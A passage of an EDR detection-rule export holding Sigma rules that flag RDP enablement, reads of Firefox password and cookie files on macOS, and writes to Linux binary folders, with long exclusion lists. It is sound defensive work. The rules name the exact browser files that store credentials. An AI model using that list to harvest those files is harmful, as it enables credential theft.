"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c19d920-4c81-4370-9af8-25e9bef6b870",
"rule_name": "Remote Desktop Services Enabled via net.exe",
"rule_description": "Detects command-line arguments starting the \"TermService\" service, which is required for Remote Desktop Services, via the \"net\" utility.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-01-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c3a5ca6-ffd2-4fe9-af67-71720831dc70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098279Z",
"creation_date": "2026-03-23T11:45:34.098281Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098285Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_firefox_sensitive_files_macos.yml",
"content": "title: Suspicious Read Access to Firefox Sensitive Files\nid: 5c3a5ca6-ffd2-4fe9-af67-71720831dc70\ndescription: |\n Detects a suspicious access to Firefox browser files that hold, for instance, cookies or users passwords.\n Adversaries may steal web application cookies and credentials and use them for lateral movement in websites or inside an organization.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_access:\n Path:\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/cookies.sqlite'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/formhistory.sqlite'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/key4.db'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/logins.json'\n ProcessImage|contains: '?'\n Kind: 'read'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n ProcessImage:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - 
'/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Applications/WithSecure/WithSecure Agent.app/Contents/MacOS/wsagent'\n exclusion_sentinel:\n Image: 
'/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_mcafee:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_checkpoint:\n Image: '/Applications/Check Point/Agents/cpamdApp.app/Contents/MacOS/cpamdApp'\n exclusion_vshield_scanner:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_kaspersky:\n Image: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n exclusion_norton:\n Image: '/Applications/Norton.app/Contents/Backend/utils/com.norton.mes.endpointsecurity.app/Contents/MacOS/com.norton.mes.endpointsecurity'\n exclusion_virusscanner:\n Image: '/Applications/VirusScannerPlus.app/Contents/MacOS/VirusScannerPlus'\n\n ### backup software ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n# Common browser exclusion\n filter_chrome:\n Image:\n - '/Applications/Google Chrome*.app/Contents/Frameworks/Google Chrome 
Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n exclusion_edge:\n Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/crashreporter'\n - '*/Firefox*.app/Contents/MacOS/minidump-analyzer'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox* Media Plugin Helper'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/crashreporter'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/minidump-analyzer'\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n exclusion_arc:\n Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - 
'/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper (Plugin).app/Contents/MacOS/Arc Helper (Plugin)'\n filter_brave:\n Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - '/Applications/Brave Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n exclusion_opera:\n Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n# end common browser exclusion\n\n exclusion_custom_certutil:\n Image:\n - '/Library/Application Support/Netskope/STAgent/certutil/certutil'\n - '/Applications/Norton.app/Contents/Backend/utils/certutil/certutil'\n - '/Applications/Avast.app/Contents/Backend/utils/certutil/certutil'\n\n exclusion_soffice:\n Image: '/Applications/LibreOffice.app/Contents/MacOS/soffice'\n\n exclusion_go2meeting:\n Image: '/Users/*/Library/Application Support/LogMeInInc/GoToMeeting/G2MUpdate'\n\n exclusion_bomgar:\n Image: '/Applications/.com.bomgar.scc.*/Remote Support Customer Client.app/Contents/MacOS/sdcust'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_copy:\n Image: '/bin/cp'\n ProcessSignatureSigningId: 'com.apple.cp'\n ProcessSigned: 'true'\n\n exclusion_bzgrep:\n Image: '/bin/cp'\n ProcessSignatureSigningId: 
'com.apple.bzgrep'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c3a5ca6-ffd2-4fe9-af67-71720831dc70",
"rule_name": "Suspicious Read Access to Firefox Sensitive Files",
"rule_description": "Detects suspicious access to Firefox browser files that hold, for instance, cookies or user passwords.\nAdversaries may steal web application cookies and credentials and use them for lateral movement across websites or inside an organization.\nIt is recommended to verify whether the process performing the read operation has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c3f0f0f-0082-4863-ba3a-b9b746772135",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.507922Z",
"creation_date": "2026-03-23T11:45:34.093975Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093979Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1036_005_suspicious_write_in_binary_folder_linux.yml",
"content": "title: Suspicious Write in the Binary Folder\nid: 5c3f0f0f-0082-4863-ba3a-b9b746772135\ndescription: |\n Detects a suspicious write to one of the common binary folders (\"/bin/\", \"/sbin\", \"/usr/bin/\", \"/usr/sbin/\").\n Adversaries may try to match the name of a legitimate system binary when creating a malicious executable.\n It is recommended to ensure that the process writing to those directories is a legitimate installer and that the file being installed isn't malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.persistence\n - attack.t1554\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n ProcessParentImage|contains: '?'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n ProcessParentImage|contains: '?'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n 
exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - 'yum update'\n - 'yum upgrade'\n - 'yum install'\n - 'sudo yum update'\n - 'sudo yum upgrade'\n - 'sudo yum install'\n exclusion_dnf:\n - ProcessImage: '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? 
-s /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - '/usr/bin/python?.? -s /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n - '/usr/bin/python? /usr/bin/dnf-3 '\n - '/usr/bin/python?.? /usr/bin/dnf-3 '\n - '/usr/bin/python? -s /usr/bin/dnf '\n - '/usr/bin/python?.? -s /usr/bin/dnf '\n - '/usr/bin/dnf5 builddep --installroot '\n - ProcessParentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dnf install'\n - 'sudo dnf update'\n - 'sudo dnf upgrade'\n - 'sudo dnf install'\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n exclusion_snapd:\n - ProcessImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessParentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n - ProcessGrandparentImage:\n - '/snap/snapd/*/usr/lib/snapd/snapd'\n - '/snap/core/*/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snapd'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/snapd/snapd'\n - '/usr/libexec/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n exclusion_packagekitd:\n ProcessImage: '/usr/libexec/packagekitd'\n exclusion_flatpak:\n ProcessImage: '/usr/libexec/flatpak-system-helper'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_hurukai:\n ProcessImage: '/opt/hurukai-agent/bin/hurukai'\n\n exclusion_systemd:\n ProcessImage: '/usr/lib/systemd/systemd'\n ProcessCommandLine|startswith: '/sbin/init'\n\n exclusion_usrmerge:\n ProcessCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 
0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '/usr/bin/runc|/usr/bin/dockerd|'\n - '/snap/docker/*/bin/runc|/snap/docker/*/bin/dockerd|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_initramfs:\n - ProcessParentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n - ProcessGrandparentCommandLine|contains:\n - '/sbin/mkinitramfs'\n - '/usr/sbin/mkinitramfs'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_oracle_cloud:\n - ProcessParentImage: '/snap/oracle-cloud-agent/*/plugins/unifiedmonitoring/unifiedmonitoring'\n - ProcessGrandparentImage: '/snap/oracle-cloud-agent/*/plugins/unifiedmonitoring/unifiedmonitoring'\n\n exclusion_nagios_xi:\n ProcessParentCommandLine|contains: '/nagiosxi/scripts/manage_services.sh '\n\n exclusion_alternatives:\n ProcessImage:\n - '/usr/sbin/alternatives'\n - '/usr/bin/update-alternatives'\n\n exclusion_ubiquity:\n ProcessCommandLine: '/sbin/init maybe-ubiquity'\n\n exclusion_axway:\n ProcessImage: '/usr/bin/Axway/Automator/PServer/bin/opscmd'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_containerd:\n - ProcessImage: '/usr/bin/containerd'\n - ProcessAncestors|contains: '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_gitlab:\n ProcessParentCommandLine: '/bin/bash /opt/gitlab/embedded/bin/symlink_ctl_cmds /opt/gitlab'\n\n exclusion_vtom:\n ProcessParentCommandLine|startswith:\n - 'ksh install_vtom '\n - '/bin/ksh /opt/vtom/abm/'\n\n exclusion_rke2_containerd:\n ProcessImage: 
'/var/lib/rancher/rke2/data/*/bin/containerd'\n ProcessParentImage: '/usr/local/bin/rke2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_wmware:\n ProcessImage: '/tmp/vmis.*/install/vmware-installer/vmis-launcher'\n\n exclusion_nvidia:\n ProcessImage:\n - '/usr/bin/nvidia-installer'\n - '/tmp/*/nvidia-linux-*/nvidia-installer'\n\n exclusion_rsync:\n # A lot of sysadmin use rsync to backup their systems, which triggers an enormous amount of false positives\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_rubrik:\n Path|startswith: '/usr/bin/rubrik/'\n ProcessImage:\n - '/usr/bin/rubrik/bootstrap_agent_main'\n - '/usr/bin/rubrik/backup_agent_main'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_bitdefender:\n ProcessImage|endswith: '/bitdefender-security-tools/bin/bdsecd'\n ProcessParentImage|endswith: '/systemd'\n\n exclusion_buildah1:\n ProcessCommandLine|startswith: 'storage-untar'\n ProcessParentImage: '/usr/bin/buildah'\n\n exclusion_buildah2:\n - ProcessCommandLine|startswith: 'buildah-in-a-user-namespace'\n - ProcessGrandparentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n - ProcessParentCommandLine|startswith:\n - 'buildah from'\n - 'buildah build'\n - 'buildah commit'\n\n exclusion_python_installations:\n ProcessCommandLine|startswith:\n - 'python3 -m pip install'\n - 'python -m pip3 install'\n - 'python3 -m pip3 install'\n - 'python -m pip install'\n - 'python3 
-m ensurepip'\n - 'python -m ensurepip'\n - '/usr/bin/python3 /usr/bin/pip install'\n - '/usr/bin/python3 /usr/bin/pip3 install'\n - '/usr/bin/python /usr/bin/pip install'\n - '/usr/bin/python /usr/bin/pip3 install'\n - '/usr/bin/python3 -m /usr/bin/pip install'\n - '/usr/bin/python -m /usr/bin/pip3 install'\n - '/usr/bin/python3 -m /usr/bin/pip3 install'\n - '/usr/bin/python -m /usr/bin/pip install'\n - '/usr/bin/python3 -m pip install'\n - '/usr/bin/python -m pip3 install'\n - '/usr/bin/python3 -m pip3 install'\n - '/usr/bin/python -m pip install'\n - '/usr/bin/python3 -m ensurepip'\n - '/usr/bin/python -m ensurepip'\n\n exclusion_ln:\n ProcessImage: '/usr/bin/ln'\n\n exclusion_convert-usrmerg:\n ProcessParentCommandLine: '/usr/bin/perl /usr/lib/usrmerge/convert-usrmerge'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_elastic:\n ProcessCommandLine|contains: 